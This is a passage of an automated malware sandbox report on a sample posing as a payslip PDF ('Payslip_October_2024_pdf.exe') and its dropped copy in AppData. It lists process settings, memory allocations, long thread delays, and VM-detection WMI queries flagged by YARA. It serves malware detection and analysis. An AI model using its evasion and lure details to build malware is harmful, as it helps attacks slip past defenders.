                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 432, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 8CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 9CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 9F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: AF00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: B310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: C310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: D310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 5030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: AFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: C710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: D710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A130000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: C380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: D380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 5140000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598606Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598484Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598366Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598191Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598068Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597813Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597563Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596871Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595856Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595730Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595526Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594969Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594749Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597203Jump to behavior
